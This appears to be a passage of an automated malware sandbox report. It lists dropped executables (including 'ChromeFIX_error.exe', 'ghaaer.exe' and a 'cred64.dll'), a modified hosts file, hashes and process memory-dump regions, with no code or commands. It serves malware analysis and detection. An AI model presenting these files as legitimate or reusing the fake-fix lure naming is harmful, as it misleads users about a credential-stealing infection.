e5c6c02bcb9753dcf3e0b885cfc82c61580f1b1bee680edcdf04888dec3bb058b9059d7d0ca9daffb9097b6a9c81ee521359a5924d990ae156d7093ff45fea34

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000113001\ChromeFIX_error.exe

Filesize
248KB

MD5
b3aaba3d4218355bcd25d239e2fe6ea4

SHA1
68756b3af0cc01a8d0cef2a5531fc39e0ab91817

SHA256
276f29ba1a1b953b096cda467a189ce229113847969d9b359771a5a8f41a5d15

SHA512
e5c6c02bcb9753dcf3e0b885cfc82c61580f1b1bee680edcdf04888dec3bb058b9059d7d0ca9daffb9097b6a9c81ee521359a5924d990ae156d7093ff45fea34

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000113001\ChromeFIX_error.exe

Filesize
248KB

MD5
b3aaba3d4218355bcd25d239e2fe6ea4

SHA1
68756b3af0cc01a8d0cef2a5531fc39e0ab91817

SHA256
276f29ba1a1b953b096cda467a189ce229113847969d9b359771a5a8f41a5d15

SHA512
e5c6c02bcb9753dcf3e0b885cfc82c61580f1b1bee680edcdf04888dec3bb058b9059d7d0ca9daffb9097b6a9c81ee521359a5924d990ae156d7093ff45fea34

Download Submit
C:\Users\Admin\AppData\Local\Temp\275444769369

Filesize
81KB

MD5
5fe57ff601183208904d459e33126f22

SHA1
ae97c6cfd3787c0c7c40af8d3e25dd62edf4d6be

SHA256
1ee3fbb1bf1051cd0510685ea763f556e7ae8c619ea5def07c02565ff571708a

SHA512
cc5448c504c358f146d537ed20282792f9f02ab69680ab976c6574d9a3135732c89ee5832ec159fefe0ee7b64ff9b92adea563ade8d94888b8fac1287bb36f96

Download Submit
C:\Users\Admin\AppData\Local\Temp\9580a00ee2\ghaaer.exe

Filesize
667.6MB

MD5
42cf398e01cf3f15dc1575bad83b703f

SHA1
d3556d724fb4fffdb256d2ceb6ae715d8663cd10

SHA256
344e36cb4ec5e07ad74f5ee8122575f872048a698d058a9d02ffe4f15f88f810

SHA512
8eb5b30cfb993d8bfaa8234b0f1856f81847ede0522c6cac7a2adaaaf9fb37119f7031c73a64ea6bec93aebf3695a380c38a999e7186323f2b0d6af954162d02

Download Submit
C:\Users\Admin\AppData\Local\Temp\9580a00ee2\ghaaer.exe

Filesize
667.6MB

MD5
42cf398e01cf3f15dc1575bad83b703f

SHA1
d3556d724fb4fffdb256d2ceb6ae715d8663cd10

SHA256
344e36cb4ec5e07ad74f5ee8122575f872048a698d058a9d02ffe4f15f88f810

SHA512
8eb5b30cfb993d8bfaa8234b0f1856f81847ede0522c6cac7a2adaaaf9fb37119f7031c73a64ea6bec93aebf3695a380c38a999e7186323f2b0d6af954162d02

Download Submit
C:\Users\Admin\AppData\Local\Temp\9580a00ee2\ghaaer.exe

Filesize
667.6MB

MD5
42cf398e01cf3f15dc1575bad83b703f

SHA1
d3556d724fb4fffdb256d2ceb6ae715d8663cd10

SHA256
344e36cb4ec5e07ad74f5ee8122575f872048a698d058a9d02ffe4f15f88f810

SHA512
8eb5b30cfb993d8bfaa8234b0f1856f81847ede0522c6cac7a2adaaaf9fb37119f7031c73a64ea6bec93aebf3695a380c38a999e7186323f2b0d6af954162d02

Download Submit
C:\Users\Admin\AppData\Local\Temp\9580a00ee2\ghaaer.exe

Filesize
368.2MB

MD5
d18357c37a0f1d1edfa9e1e3ff14d2ce

SHA1
d6a4b4551c5650df95f87c22939f74e3e2276d3a

SHA256
639b037c5425c4665626c0d176f6de6631a67eb7f6d12e2f32b16064a3da9e1f

SHA512
7551dcc3aeb8e24625299aaa8f8119cf15e0b12c7642b4940b865f70eb7a3a3c71e465976b197a6c634c31f38474d3115b4db9ade4532841602e96fb6cf905d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\ProgramStarter.exe

Filesize
460KB

MD5
0326f45523014399dea91452c957b5e0

SHA1
47a4b2f2c8afdb5efbad429f2ea3485b3752ec45

SHA256
1a3db0001b52cb3f6e16c45fc2d4d70fc3706b421a9b2b5006172026c60d84d7

SHA512
2aa4b7af945a936b16405a125fee48c998dd42b8423f7cd56b5b49e7d270786d23d359729fb7e7dd212369aaaab98c3e444f05c902f1c1e15416f7828ad21b42

Download Submit
C:\Users\Admin\AppData\Local\Temp\ProgramStarter.exe

Filesize
460KB

MD5
0326f45523014399dea91452c957b5e0

SHA1
47a4b2f2c8afdb5efbad429f2ea3485b3752ec45

SHA256
1a3db0001b52cb3f6e16c45fc2d4d70fc3706b421a9b2b5006172026c60d84d7

SHA512
2aa4b7af945a936b16405a125fee48c998dd42b8423f7cd56b5b49e7d270786d23d359729fb7e7dd212369aaaab98c3e444f05c902f1c1e15416f7828ad21b42

Download Submit
C:\Users\Admin\AppData\Local\Temp\ProgramStarter.exe

Filesize
460KB

MD5
0326f45523014399dea91452c957b5e0

SHA1
47a4b2f2c8afdb5efbad429f2ea3485b3752ec45

SHA256
1a3db0001b52cb3f6e16c45fc2d4d70fc3706b421a9b2b5006172026c60d84d7

SHA512
2aa4b7af945a936b16405a125fee48c998dd42b8423f7cd56b5b49e7d270786d23d359729fb7e7dd212369aaaab98c3e444f05c902f1c1e15416f7828ad21b42

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2pissrse.vmw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\4cde9a6ad1bb7f\cred64.dll

Filesize
162B

MD5
1b7c22a214949975556626d7217e9a39

SHA1
d01c97e2944166ed23e47e4a62ff471ab8fa031f

SHA256
340c8464c2007ce3f80682e15dfafa4180b641d53c14201b929906b7b0284d87

SHA512
ba64847cf1d4157d50abe4f4a1e5c1996fe387c5808e2f758c7fb3213bfefe1f3712d343f0c30a16819749840954654a70611d2250fd0f7b032429db7afd2cc5

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
1KB

MD5
8f9d15879efa6c3ed8de66af514e838c

SHA1
55d3c0edc92fe0b60d739a2b835d0bd4fa0d71eb

SHA256
7372bd2a82f9c92553f24894ff45f0d3b7c14ed7ba9b57ebac1dac4106f3749e

SHA512
7bf5f661657c79ad97cb621508607576c169ef9ca9c27c34023ce670dbb2a3eb915352dcfb81e2c9ff51075a6603ab9cd2a47a944d4f76fcb13e438a2ee5f94e

Download Submit
memory/1112-234-0x0000000009DD0000-0x0000000009E36000-memory.dmp

Filesize
408KB

Download
memory/1112-219-0x0000000007AF0000-0x0000000007B00000-memory.dmp

Filesize
64KB

Download
memory/1112-319-0x0000000007AF0000-0x0000000007B00000-memory.dmp

Filesize
64KB

Download
memory/1112-216-0x0000000000D70000-0x0000000000DEA000-memory.dmp

Filesize
488KB

Download
memory/1496-335-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/1496-377-0x0000000000100000-0x0000000000142000-memory.dmp

Filesize
264KB

Download
memory/1496-382-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/2332-270-0x0000000005B10000-0x0000000006128000-memory.dmp

Filesize
6.1MB

Download
memory/2332-321-0x0000000006F10000-0x00000000070D2000-memory.dmp

Filesize
1.8MB

Download
memory/2332-264-0x0000000000400000-0x0000000000432000-memory.dmp

Filesize
200KB

Download
memory/2332-329-0x0000000005900000-0x0000000005910000-memory.dmp

Filesize
64KB

Download
memory/2332-271-0x0000000005600000-0x000000000570A000-memory.dmp

Filesize
1.0MB

Download
memory/2332-272-0x0000000005530000-0x0000000005542000-memory.dmp

Filesize
72KB

Download
memory/2332-273-0x0000000005590000-0x00000000055CC000-memory.dmp

Filesize
240KB

Download
memory/2332-274-0x0000000005900000-0x0000000005910000-memory.dmp

Filesize
64KB

Download
memory/2332-323-0x0000000007610000-0x0000000007B3C000-memory.dmp

Filesize
5.2MB

Download
memory/2484-150-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/2484-163-0x0000000000190000-0x00000000001D2000-memory.dmp

Filesize
264KB

Download
memory/2728-298-0x000000007EF20000-0x000000007EF30000-memory.dmp

Filesize
64KB

Download
memory/2728-310-0x0000000006560000-0x000000000657E000-memory.dmp

Filesize
120KB

Download
memory/2728-278-0x0000000002B40000-0x0000000002B50000-memory.dmp

Filesize
64KB

Download
memory/2728-324-0x0000000007600000-0x0000000007608000-memory.dmp

Filesize
32KB

Download
memory/2728-284-0x0000000005850000-0x0000000005872000-memory.dmp

Filesize
136KB

Download
memory/2728-289-0x0000000005A00000-0x0000000005A66000-memory.dmp

Filesize
408KB

Download
memory/2728-290-0x0000000005FC0000-0x0000000005FDE000-memory.dmp

Filesize
120KB

Download
memory/2728-297-0x0000000002B40000-0x0000000002B50000-memory.dmp

Filesize
64KB

Download
memory/2728-275-0x0000000002A20000-0x0000000002A56000-memory.dmp

Filesize
216KB

Download
memory/2728-299-0x0000000007190000-0x00000000071C2000-memory.dmp

Filesize
200KB

Download
memory/2728-300-0x000000006C000000-0x000000006C04C000-memory.dmp

Filesize
304KB

Download
memory/2728-277-0x0000000002B40000-0x0000000002B50000-memory.dmp

Filesize
64KB

Download
memory/2728-313-0x0000000007910000-0x0000000007F8A000-memory.dmp

Filesize
6.5MB

Download
memory/2728-314-0x00000000072D0000-0x00000000072EA000-memory.dmp

Filesize
104KB

Download
memory/2728-316-0x0000000007340000-0x000000000734A000-memory.dmp

Filesize
40KB

Download
memory/2728-317-0x0000000007560000-0x00000000075F6000-memory.dmp

Filesize
600KB

Download
memory/2728-322-0x0000000007620000-0x000000000763A000-memory.dmp

Filesize
104KB

Download
memory/2728-320-0x0000000007520000-0x000000000752E000-memory.dmp

Filesize
56KB

Download
memory/2728-276-0x0000000005190000-0x00000000057B8000-memory.dmp

Filesize
6.2MB

Download
memory/2768-149-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/2768-134-0x0000000000140000-0x0000000000182000-memory.dmp

Filesize
264KB

Download
memory/2768-133-0x0000000000400000-0x00000000004C9000-memory.dmp

Filesize
804KB

Download
memory/3296-217-0x0000000007CC0000-0x0000000007CD0000-memory.dmp

Filesize
64KB

Download
memory/3296-201-0x0000000000AB0000-0x0000000000CFE000-memory.dmp

Filesize
2.3MB

Download
memory/3296-202-0x0000000008050000-0x00000000085F4000-memory.dmp

Filesize
5.6MB

Download
memory/3296-203-0x0000000007B80000-0x0000000007C12000-memory.dmp

Filesize
584KB

Download
memory/3296-218-0x0000000008CD0000-0x0000000008CDA000-memory.dmp

Filesize
40KB

Download
memory/4400-249-0x0000000000A50000-0x00000000018AF000-memory.dmp

Filesize
14.4MB

Download
memory/4400-239-0x0000000000A50000-0x00000000018AF000-memory.dmp

Filesize
14.4MB

Download